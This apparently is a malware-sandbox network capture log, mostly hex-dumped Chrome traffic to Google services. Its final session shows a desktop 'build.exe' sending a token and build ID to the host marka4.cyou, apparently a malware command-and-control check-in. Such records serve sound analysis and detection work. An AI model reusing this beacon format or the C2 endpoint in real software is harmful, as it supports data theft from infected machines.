2025-01-11 22:00:11 UTC	415	IN	Data Raw: 31 39 38 0d 0a 5c 22 29 3b 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 24 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4d 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4d 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 61 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 Data Ascii: 198\");};_.ae\u003dfunction(a){if($d.test(a))return a};_.be\u003dfunction(a){if(a instanceof _.Md)if(a instanceof _.Md)a\u003da.i;else throw Error(\"F\");else a\u003d_.ae(a);return a};_.ce\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d
2025-01-11 22:00:11 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 52 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 79 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 66 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 Data Ascii: 8000\|\"\"};\n_.de\u003dfunction(a){var b\u003d_.Ra(a);return b\u003d\u003d\"array\"\|\|b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.ee\u003dfunction(a,b,c){return _.yb(a,b,c,!1)!\u003d\u003dvoid 0};_.fe\u003dfunction(a,b){re

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49743	142.250.184.196	443	4076	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:11 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-11 22:00:11 UTC	933	IN	HTTP/1.1 200 OK Version: 713742394 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 11 Jan 2025 22:00:11 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-01-11 22:00:11 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2025-01-11 22:00:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49753	142.250.185.142	443	4076	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:14 UTC	733	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-11 22:00:14 UTC	915	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117446 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Fri, 10 Jan 2025 21:12:37 GMT Expires: Sat, 10 Jan 2026 21:12:37 GMT Cache-Control: public, max-age=31536000 Last-Modified: Wed, 08 Jan 2025 15:23:05 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 89257 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-11 22:00:14 UTC	475	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
2025-01-11 22:00:14 UTC	1390	IN	Data Raw: 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b 5f Data Ascii: lue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_
2025-01-11 22:00:14 UTC	1390	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 61 Data Ascii: unction(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(a
2025-01-11 22:00:14 UTC	1390	IN	Data Raw: 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 Data Ascii: for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;this
2025-01-11 22:00:14 UTC	1390	IN	Data Raw: 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 Data Ascii: ("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototyp
2025-01-11 22:00:14 UTC	1390	IN	Data Raw: 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 Data Ascii: one)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regula
2025-01-11 22:00:14 UTC	1390	IN	Data Raw: 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 Data Ascii: hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Er
2025-01-11 22:00:14 UTC	1390	IN	Data Raw: 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 Data Ascii: his[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.prototy
2025-01-11 22:00:14 UTC	1390	IN	Data Raw: 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 Data Ascii: tion(){if(!a\|\|typeof a!="function"\|\|!a.prototype.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.ne
2025-01-11 22:00:14 UTC	1390	IN	Data Raw: 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53 74 Data Ascii: ay.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a\|\|_.la});ma("St

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49755	142.250.185.238	443	4076	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:15 UTC	726	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 913 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-11 22:00:15 UTC	913	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 36 36 33 32 38 31 32 38 33 36 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1736632812836",null,null,null,
2025-01-11 22:00:15 UTC	945	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=520=mhfBpS43nzUri2mLiVrDF8ky5d8_NZ-LV0BLV-YqYTQ5VWxDn41-Vy1LO58GCmJLA1jXUSUV7OT3YI1TE_zPMNxeH9GC_OoA5jSamJHuv7l7d4Cq0Yk0N7yvUoN6wYXndHHq2SGE5dsEzrrYnpqk5MitNrq7csogYZ2U0-vHiYyBFUKq9Xzh9A2cr3k; expires=Sun, 13-Jul-2025 22:00:15 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Sat, 11 Jan 2025 22:00:15 GMT Server: Playlog X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Sat, 11 Jan 2025 22:00:15 GMT Cache-Control: private Connection: close Transfer-Encoding: chunked
2025-01-11 22:00:15 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2025-01-11 22:00:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49760	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:16 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----i5pz5pz5pzctjec2vaaa User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 1081 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:16 UTC	1081	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 69 35 70 7a 35 70 7a 35 70 7a 63 74 6a 65 63 32 76 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 69 35 70 7a 35 70 7a 35 70 7a 63 74 6a 65 63 32 76 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 69 35 70 7a 35 70 7a 35 70 7a 63 74 6a 65 63 32 76 61 61 61 0d 0a 43 6f 6e 74 Data Ascii: ------i5pz5pz5pzctjec2vaaaContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------i5pz5pz5pzctjec2vaaaContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------i5pz5pz5pzctjec2vaaaCont
